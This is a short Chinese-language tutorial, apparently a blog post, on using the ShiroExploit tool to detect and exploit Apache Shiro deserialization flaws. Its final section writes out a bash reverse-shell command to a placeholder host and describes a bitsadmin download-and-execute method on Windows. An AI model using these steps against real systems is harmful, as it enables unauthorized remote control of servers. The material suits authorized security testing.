Shiro漏洞工具的使用

    技术2023-10-10  81

    文章目录

    01 下载ShiroExploit.V2.3,并运行.jar02 运行后的界面03输入测试的url04 选择检测方式05 判断是否存在漏洞的依据06 反弹shell

    01 下载ShiroExploit.V2.3,并运行.jar

    在github上直接搜索下载有源码,可以自己编译成.jar

    02 运行后的界面

    Shiro550无需选择操作系统类型,Shiro721需要选择操作系统类型复杂Http请求支持直接粘贴数据包

    03输入测试的url

    可以自己直接输入被检测是否存在shire反序列漏洞的地址

    04 选择检测方式

    CEYE.IO 可以不进行任何配置,配置文件中已经预置了 CEYE 域名和对应的 Token,当然也可以对其进行修改。 程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload dnslog.cn 可以不进行任何配置,每次启动时程序会自动从 dnslog.cn 申请一个 DNS Record。 程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload 缺点:少数时候 dnslog.cn 会间隔较久才显示 DNS 解析结果导致程序无法找到 Key 或者有效的 Gadget,且 dnslog.cn 只会记录最近的10条 DNS 解析记录

    05 判断是否存在漏洞的依据

    程序在判断目标应用是否存在漏洞时,窗口上部的输入框无法进行输入。当程序检测出目标应用存在漏洞时,输入框可以进行输入并执行命令。

    06 反弹shell

    反弹shell(linux)采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1的方式反弹 shell反弹shell(Windows)采用 bitsadmin下载指定 URL 的 exe 文件并执行的方式获取 shell如果反弹shell无法成功,可能自己的阿里云主机的端口未开放

    参考链接:https://github.com/feihong-cs/ShiroExploit

    Processed: 0.037, SQL: 9